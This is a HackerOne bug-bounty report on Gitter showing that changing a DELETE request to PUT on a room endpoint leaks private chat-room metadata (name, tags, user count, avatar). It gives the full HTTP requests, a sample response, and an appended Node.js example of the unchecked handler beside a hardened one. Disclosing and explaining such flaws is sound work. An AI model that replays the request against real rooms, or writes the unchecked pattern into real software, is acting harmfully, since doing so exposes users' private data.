Disclosure of information of a private chat room if you have room ID
HackerOne report #489976 by dhakalananda
on 2019-02-01, assigned to asaba
Summary:
Hi GitLab,
I have found a vulnerability that allows an attacker to view the confidential data of the private chat room.
Description:
You can get the information of the chat room by using the specific request [described in Steps to Reproduce]. All you need to perform this attack is the room_id. You get the following information of a private chat room:
- Name
- Number of users
- URL
- Profile Picture of the room
- Mentions Count
- Tags
Steps To Reproduce:
PUT /api/v1/user/user_id/rooms/room_id HTTP/1.1
Host: gitter.im
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://gitter.im
X-Requested-With: XMLHttpRequest
x-access-token: access_token
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Referer: https://gitter.im/testingtheinternet/Public-Room
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: cookie
You can use the request above to exploit this vulnerability.
There is another way to get this request. Follow these steps:
- Create a Gitter account
- Make a conversation and go to All Conversations
- Capture the request sent when hiding the room from All Conversations.
Request looks like this:
DELETE /api/v1/user/user_id/rooms/room_id HTTP/1.1
Host: gitter.im
Connection: close
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://gitter.im
X-Requested-With: XMLHttpRequest
x-access-token: access_token
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Referer: https://gitter.im/testingtheinternet/Public-Room
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: cookie
All you have to do is change the DELETE request to a PUT request. To get the information of a private room, change the room_id to that of the private room.
Response from the server:
{
  "id": "<roomId>",
  "name": "<roomName>",
  "topic": "",
  "avatarUrl": "https://avatars-01.gitter.im/group/i/<roomId>",
  "uri": "<roomUri>",
  "oneToOne": false,
  "userCount": 1,
  "unreadItems": 0,
  "mentions": 0,
  "lurk": false,
  "url": "/<roomUri>",
  "githubType": "REPO_CHANNEL",
  "security": "PRIVATE",
  "noindex": false,
  "tags": ["heck", "hacked"],
  "roomMember": false,
  "groupId": "<groupId>",
  "group": {
    "id": "<groupId>",
    "name": "<groupName>",
    "uri": "<groupUri>",
    "homeUri": "<homeUri>",
    "backedBy": {"type": null},
    "avatarUrl": "https://avatars-01.gitter.im/group/i/<groupId>"
  },
  "public": false,
  "v": 2
}
Impact
An unauthorized user could get the information of a private room. Sensitive information like tags, user count and profile picture of a private room could get leaked if the attacker has the room_id.
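The root cause the report describes is a room lookup that returns metadata for whatever room_id it is given, without checking whether the requesting user may see that room. The following is an added example, not Gitter's or GitLab's code: a minimal Node.js model of that handler in its unchecked form next to a hardened form that gates private rooms on membership. The room data, user ids and the function names (roomForUserUnchecked, roomForUser, canViewRoom) are constructed for the example.

```javascript
// Added example (not the project's code): room metadata lookup with and
// without an authorization check. All rooms and users below are constructed.
const rooms = new Map([
  ["room-public-1", {
    id: "room-public-1", name: "Public-Room",
    uri: "testingtheinternet/Public-Room", security: "PUBLIC",
    tags: [], members: new Set(["u1"]),
  }],
  ["room-private-1", {
    id: "room-private-1", name: "Secret-Room",
    uri: "example-org/Secret-Room", security: "PRIVATE",
    tags: ["heck", "hacked"], members: new Set(["u2"]),
  }],
]);

// Serialize the room fields the report lists (name, user count, URL, tags,
// membership). The caller decides first whether the user may see them at all.
function serializeRoom(room, userId) {
  return {
    id: room.id,
    name: room.name,
    uri: room.uri,
    url: "/" + room.uri,
    security: room.security,
    public: room.security === "PUBLIC",
    userCount: room.members.size,
    tags: [...room.tags],
    roomMember: room.members.has(userId),
  };
}

// Unchecked shape: any authenticated user who knows a room id gets its
// metadata, which is the behaviour the report describes.
function roomForUserUnchecked(userId, roomId) {
  const room = rooms.get(roomId);
  if (!room) return { status: 404, body: { error: "Not found" } };
  return { status: 200, body: serializeRoom(room, userId) };
}

// Authorization rule: public rooms are visible to everyone, private rooms
// only to their members.
function canViewRoom(room, userId) {
  if (room.security === "PUBLIC") return true;
  return room.members.has(userId);
}

// Hardened shape: the membership check runs before any field is serialized,
// and a private room the user cannot see is answered exactly like a room
// that does not exist, so the response does not confirm the id is valid.
function roomForUser(userId, roomId) {
  const room = rooms.get(roomId);
  if (!room || !canViewRoom(room, userId)) {
    return { status: 404, body: { error: "Not found" } };
  }
  return { status: 200, body: serializeRoom(room, userId) };
}
```

The same check belongs on every verb that touches the room resource (the report shows both PUT and DELETE on the same path), because routing the authorization decision through one function such as canViewRoom is what keeps a later-added method from reintroducing the leak.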